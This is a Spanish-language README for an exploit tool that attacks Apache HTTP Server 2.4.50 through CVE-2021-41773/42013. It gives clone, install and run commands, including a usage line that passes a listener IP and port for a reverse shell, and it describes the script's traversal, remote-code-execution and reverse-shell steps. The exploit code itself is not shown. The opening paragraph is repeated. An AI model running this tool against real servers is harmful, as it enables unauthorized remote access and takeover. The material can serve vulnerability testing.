
Apache-HTTP-Server-2.4.50-RCE Esta herramienta está diseñada para probar servidores Apache por la vulnerabilidad CVE-2021-41773 / CVE-2021-42013. Está destinada únicamente con fines educativos y debe usarse de manera responsable en sistemas en los que tenga permiso explícito para realizar pruebas.
Esta herramienta está diseñada para probar servidores Apache en busca de la vulnerabilidad CVE-2021-41773 / CVE-2021-42013. Está destinada únicamente a fines educativos y debe usarse de manera responsable en sistemas para los que tenga permiso explícito de prueba.
git clone https://github.com/Zyx2440/Apache-HTTP-Server-2.4.50-RCE.git
cd Apache-HTTP-Server-2.4.50-RCE
pip3 install requests~=2.27.1 termcolor~=1.1.0
pip3 install -r add_requirements.txt
python3 50512.py target.txt -ip <TuIp> -port <ElPuerto>
el archivo de texto debe contener la URL del objetivo
python3 50512.py target.txt -ip 10.0.2.15 -port 4444



Verificación de versión de Apache: Para cada URL en el archivo proporcionado, comprueba si el servidor está ejecutando Apache versión 2.4.50.
Si el servidor es vulnerable: Intenta explotar el servidor enviando payloads para desencadenar ataques de directory traversal o ejecutar código de forma remota. Si CGI está habilitado: Intenta inyectar un payload de reverse shell para obtener acceso remoto.
Solo para uso educativo: El script está destinado a fines educativos para demostrar cómo se pueden probar y explotar vulnerabilidades. Usar este script contra objetivos no autorizados es ilegal y poco ético.
Propósito de la modificación: Se agregó manejo adicional de errores y se optimizó la lógica de payload y RCE, y se eliminó cve.